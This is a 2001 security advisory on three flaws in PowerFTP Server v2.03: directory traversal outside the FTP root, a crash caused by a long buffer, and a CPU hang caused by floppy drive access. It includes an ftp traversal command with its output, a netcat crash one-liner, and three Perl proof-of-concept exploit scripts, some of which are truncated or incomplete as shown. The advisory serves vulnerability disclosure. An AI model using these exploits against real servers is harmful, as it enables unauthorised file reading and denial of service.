PowerFTP Directory Traversal and DoS Vulnerabilities
30 Nov. 2001
Summary
PowerFTP is a powerful FTP client/server software. Three security vulnerabilities have been found in the product - one allows access to files that reside outside the chained FTP root directory, another to cause the product to crash by sending it a long buffer, and the last one to utilize all available CPU by accessing the floppy drive.
Credit:
The information has been provided by al3x hernandez.
Directory Traversal: Example:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
Exploit:
#!/usr/bin/perl
# Simple script to view the files from the ftp server,
# even if they are outside of root directory.
#
# This script assume OS WinNT/2k/W.x and it looked
# for directories of IIS.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_data.pl -s <server>
#
# Examples:
#
# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
# perl -x PowerFTP_data.pl -s 10.0.0.1
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);
$CRLF = "\015\012";
@drives = ("c","d","e"); #Possible drives remotes
# If u needed read the drive A floopy add this line
# @drives = ("a","c","d","e","f".......etc,etc
$port = 21;
$login = 'temp'; #Maybe u needed to change this
$pass = 'temp'; #Maybe u needed to change this
Denial of Service: Example:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
The server will then crash causing a denial of service attack.
Exploit:
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\nUsage: $0 -s <server>\n\n");}
Exploit: (DoS attack via floppy)
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
